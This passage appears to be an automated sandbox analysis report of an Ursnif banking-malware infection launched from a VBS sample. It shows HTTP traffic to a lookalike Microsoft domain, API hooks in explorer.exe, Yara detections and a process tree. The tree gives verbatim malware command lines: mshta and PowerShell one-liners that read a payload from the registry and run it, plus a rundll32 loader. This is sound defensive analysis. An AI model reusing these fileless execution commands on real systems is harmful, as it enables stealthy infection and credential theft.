                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                            Content-Length: 675
                                                            Host: art.microsoftsofymicrosoftsoft.at
                                                            Sep 10, 2021 11:14:36.316087961 CEST8739INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Fri, 10 Sep 2021 09:14:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function NameHook TypeActive in Processes
                                                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                            CreateProcessAsUserWEATexplorer.exe
                                                            CreateProcessAsUserWINLINEexplorer.exe
                                                            CreateProcessWEATexplorer.exe
                                                            CreateProcessWINLINEexplorer.exe
                                                            CreateProcessAEATexplorer.exe
                                                            CreateProcessAINLINEexplorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: user32.dll
                                                            Function NameHook TypeNew Data
                                                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFD88935200
                                                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4E0777C
                                                            Process: explorer.exe, Module: WININET.dll
                                                            Function NameHook TypeNew Data
                                                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFD88935200
                                                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4E0777C
                                                            Process: explorer.exe, Module: KERNEL32.DLL
                                                            Function NameHook TypeNew Data
                                                            CreateProcessAsUserWEAT7FFD8893521C
                                                            CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                            CreateProcessWEAT7FFD88935200
                                                            CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                            CreateProcessAEAT7FFD8893520E
                                                            CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:11:10:12
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
                                                            Imagebase:0x7ff60a090000
                                                            File size:163840 bytes
                                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:11:13:04
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff7e33a0000
                                                            File size:488448 bytes
                                                            MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:11:13:06
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                            Imagebase:0x7ff60c3c0000
                                                            File size:69632 bytes
                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:11:13:06
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                            Imagebase:0xf40000
                                                            File size:61952 bytes
                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, Author: Joe Security
                                                            Reputation:high

                                                            General

                                                            Start time:11:13:43
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x1300000
                                                            File size:426496 bytes
                                                            MD5 hash:7AB59579BA91115872D6E51C54B9133B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:11:13:50
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff7e33a0000
                                                            File size:488448 bytes
                                                            MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:11:13:53
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\System32\mshta.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                            Imagebase:0x7ff689d80000
                                                            File size:14848 bytes
                                                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:11:13:55
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                            Imagebase:0x7ff743d60000
                                                            File size:447488 bytes
                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, Author: Joe Security
                                                            Reputation:high

                                                            General

                                                            Start time:11:13:55
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:11:14:03
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                                                            Imagebase:0x7ff6cb430000
                                                            File size:2739304 bytes
                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET

                                                            General

                                                            Start time:11:14:05
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
                                                            Imagebase:0x7ff6f6960000
                                                            File size:47280 bytes
                                                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:11:14:08
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
                                                            Imagebase:0x7ff6cb430000
                                                            File size:2739304 bytes
                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET

                                                            General

                                                            Start time:11:14:09
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'
                                                            Imagebase:0x7ff6f6960000
                                                            File size:47280 bytes
                                                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:11:14:16
                                                            Start date:10/09/2021
                                                            Path:C:\Windows\System32\control.exe
                                                            Wow64 process (32bit):
                                                            Commandline:C:\Windows\system32\control.exe -h
                                                            Imagebase:
                                                            File size:117760 bytes
                                                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >